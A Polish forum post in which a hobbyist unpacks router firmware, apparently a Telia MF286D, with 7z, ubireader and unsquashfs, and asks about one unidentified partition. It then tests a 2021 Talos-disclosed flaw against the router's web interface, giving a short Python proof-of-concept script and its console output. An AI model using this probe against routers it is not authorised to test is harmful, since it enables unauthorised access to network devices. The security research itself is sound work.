Lubię taką motywację 
Póki co udało mi się rozpakować
* 8 *
$ 7z e mtd8.bin
* 9 *
$ ubireader_extract_images mtd9.bin
$ unsquashfs img-803481881_vol-ubi_rootfs.ubifs
* 21 *
$ unsquashfs mtd21.bin
Walczę z 10, jakies sugestie? Wykryło mi jako
mtd10.bin: Apple DiskCopy 4.2 image DF01.05, 1067264 bytes, 0xc4 encoding, 0x5a format
ale to chyba jest ściema.
Wydaje mi się, że na B02 (BD_TELIAMF286DV1.0.0B02 [Nov 2 2019 08:08:50]) działa https://talosintelligence.com/vulnerabi … -2021-1316
Taki brudny kod
print(requests.get(f'http://{router_ip}/goform/goform_get_cmd_process',
params={'cmd': 'last_login_time', 'isTest': 'false'},
headers=headers, cookies=login.cookies).json())
print(requests.get(f'http://{router_ip}/goform/goform_get_cmd_process',
params={'cmd': 'last_login_time', 'multi_data': 1, 'last_login_time_flag': 0},
headers=headers, cookies=login.cookies).json())
print(requests.get(f'http://{router_ip}/goform/goform_get_cmd_process',
params={'cmd': 'last_login_time', 'isTest': 'false'},
headers=headers, cookies=login.cookies).json())
daje mi w konsoli
{'last_login_time': '54624'}
{'last_login_time': '54624'}
{'last_login_time': ''}
Exploit jest z 2021, soft z 2019